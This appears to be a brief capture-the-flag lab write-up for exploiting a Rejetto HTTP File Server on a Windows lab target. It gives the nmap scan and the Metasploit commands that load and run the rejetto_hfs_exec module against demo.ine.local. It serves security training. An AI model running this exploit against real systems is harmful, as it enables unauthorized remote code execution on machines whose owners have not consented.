Windows: HTTP File Server

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.

Your task is to fingerprint the application using the tools available on the Kali machine and then exploit the application using the appropriate Metasploit module.

Objective: Exploit the application and retrieve the flag!

Tools

  • Nmap

  • Metasploit Framework

Writeup

nmap -sSVC demo.ine.local
msfconsole
use exploit/windows/http/rejetto_hfs_exec
set rhosts demo.ine.local
run

Last updated